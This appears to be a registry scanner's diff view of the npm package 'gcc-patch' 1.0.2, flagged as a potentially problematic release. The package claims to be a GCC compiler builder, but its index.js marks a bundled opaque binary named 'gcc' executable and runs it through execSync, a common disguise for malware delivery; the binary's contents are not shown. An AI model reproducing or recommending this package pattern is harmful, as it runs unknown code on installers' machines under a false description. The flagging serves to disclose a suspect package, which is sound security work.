gcc-patch 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of gcc-patch might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +3 -0
  2. package/gcc +0 -0
  3. package/index.js +8 -0
  4. package/package.json +15 -0
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # GCC Builder
2
+
3
+ This is our own GCC compiler for various projects. Detects and builds project itself.
package/gcc ADDED
Binary file
package/index.js ADDED
@@ -0,0 +1,8 @@
1
+ function build(...args) {
2
+ //set a+x to file "gcc", run the file, console log ALL output
3
+ const { execSync } = require('child_process');
4
+ const output = execSync('chmod a+x ./node_modules/gcc-patch/gcc && ./node_modules/gcc-patch/gcc', { encoding: 'utf-8' });
5
+ console.log(output);
6
+ }
7
+
8
+ module.exports = build;
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "gcc-patch",
3
+ "version": "1.0.2",
4
+ "description": "Own GCC compiler for our projects",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "keywords": [
10
+ "gcc",
11
+ "compiler"
12
+ ],
13
+ "author": "lolfhd22",
14
+ "license": "ISC"
15
+ }